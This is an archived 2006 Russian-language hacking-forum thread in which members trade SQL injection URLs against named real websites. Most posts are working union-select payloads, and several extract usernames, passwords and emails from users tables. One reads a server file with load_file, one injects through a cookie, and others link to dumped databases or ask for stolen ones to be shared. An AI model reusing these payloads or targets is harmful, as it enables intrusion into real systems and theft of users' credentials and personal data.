SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    давно я сюда не заходил...

    _http://porto.com.ua/?pg=catalog
     
    2 people like this.
  2. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    А в чем смысл этой ошибки, если не секрет? Где здесь скуль-инж? Как его применить?

    http://www.calibra-club.ru/profileclub.php?mode=viewprofile&u=17'
    Правда дальше раскопать не получилось. Такое чувство, что это не скуль, а подстава.
     
    1 person likes this.
  3. DIAgen

    DIAgen Banned Life!

    Joined:
    2 May 2006
    Messages:
    1,055
    Likes Received:
    376
    Reputations:
    460
    http://test.acunetix.com/artists.php?artist=3333 union select 111,222,333/*-
    Так просто разберался со сканером, вот решил посмотреть что они предлагают для тестирования)))
     
    1 person likes this.
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    2podkashey http://porto.com.ua/?pg=phpinfo =)
     
    1 person likes this.
  5. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Два провайдера:
    http://medialite-net.ru/about\'

    http://sknt.ru
    В cookies: KEngineSession: \' union select 1,2,3,4,5/*
     
    #25 Go0o$E, 3 Aug 2006
    Last edited: 3 Aug 2006
    1 person likes this.
  6. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    la2info.ru

    Code:
    _http://la2info.ru/db.php?action=npcs[COLOR=Red](АМПЕРСАНД)[/COLOR]npcid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
    P.S. с амперсандом фигня какая-то, не отображается.
     
    1 person likes this.
  7. @lcash

    @lcash Member

    Joined:
    29 Jul 2006
    Messages:
    1
    Likes Received:
    7
    Reputations:
    0
    http://www.supercomputingonline.com/article.php?sid=2252
    http://www.worthplaying.com/article.php?sid=31196
    http://www.gamingreport.com/article.php?sid=21543
     
  8. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Go0o$E

    Вот тебе база http://medialite-net.ru , _http://emiq.nm.ru/bacup.sql качай )))
     
    4 people like this.
  9. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    SQL injection на injection.ru =))

    Code:
    _http://injection.ru/?id=-1 union select 1,2,3,4,5,6,7,8,9/*
     
    #29 degeneration x, 4 Aug 2006
    Last edited by a moderator: 4 Aug 2006
    1 person likes this.
  10. -dp-

    -dp- Banned

    Joined:
    13 May 2006
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    Написал бы как скачал сразу =))

    install/upgrade.php
    install/upgrade_301.php?step=\'
     
  11. atall v.5

    atall v.5 New Member

    Joined:
    9 Jul 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    epidem.ru


    http://epidem.ru/modules.php?name=News&pagenum=\'
     
  12. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    server version for the right syntax to use near '-10, 10' at line 1
    ИМХО скуль в LIMIT находится, смысла поэтому в нем не много. ;)

    Для тех кто хочет покопаться в Postgresql:
    http://club.veresk.ru/?part_id=18-1%20union%20select%20version()
     
  13. LordNet

    LordNet Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    Вот нашел:
    http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,555/*

    После 20 мин получилось вот такое )) :
    Code:
    http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,CONCAT('ID=',id,'%20Login=',Login,'%20Passord=',password,'%20Mail=',%20email,'%20ICQ=',icq)+from+users/*
    Может, кто захочет дальше поковырять.
     
    #33 LordNet, 10 Aug 2006
    Last edited by a moderator: 11 Aug 2006
    1 person likes this.
  14. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    sql иньекция в сбербанке )

    http://www.vsb.vrn.ru/vbank/branches.asp?bk=1%20UNION%20SSS
     
  15. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Sql на www.territory.ru

    POST http://www.territory.ru/info/news/index.php?show=cat&id=0 HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: www.territory.ru
    Content-Length: 57
    Connection: Close
    Pragma: no-cache

    show=login&login='&[email protected]

    2 Tem
    Если сможешь тут слить базу, ОЧЕНЬ буду признателен, если скинешь ее и мне. 8)
     
  16. w00lf

    w00lf New Member

    Joined:
    3 Jul 2006
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    https://secure.mysociety.org/ cvstrac/getfile/mysociety/twfy/db/users.sql

    home.southernct.edu/~dorrt1/work/lablog/admins.sql

    members.home.nl/j.fridzema/database.sql
     
  17. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Вот, поднакопилось.
    Code:
    http://www.4webhelp.net/tutorials/?cid=9%20union%20select%201,2,user_password,4,5,6%20from%20users/*
    http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from%20users/*-
    http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email,555,666,777,888,999%20from%20user/*-
    http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_members/*-
    http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from%20users%20limit%203,4/*
    http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,username,3,password,5,6,7,8,9%20from%20users/*-
    http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,3,4,5,6,7,8/*-
    http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20111,222/*-
    http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,email,password%20from%20users/*-
    http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/*
    http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0/*
    http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
    http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from%20orders/*
    http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8,9,0,1/*
    http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/*
    http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,22,33,4,5,6,7,8,9,0,1,2/*
     
    1 person likes this.
  18. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    вот еще одна
    http://albatros.uz/index.php?option=content&task=view&id=6&Itemid=30'
     
  19. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    а вот на wap.wab.ru
    при отправке письма выдает:
    Ошибка при отправке письма! Попробуйте еще раз.
    ERROR You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'Юзернейм')and(idtowhom = '515488')and(topic = ''') limit 1' at lin
     
  20. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    Вот нашел только вот толку маловато наверно, так как я не могу найти таблицу users
    _http://www.yuretz.ru/prikol.php?id=470+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*
     
Thread Status:
Not open for further replies.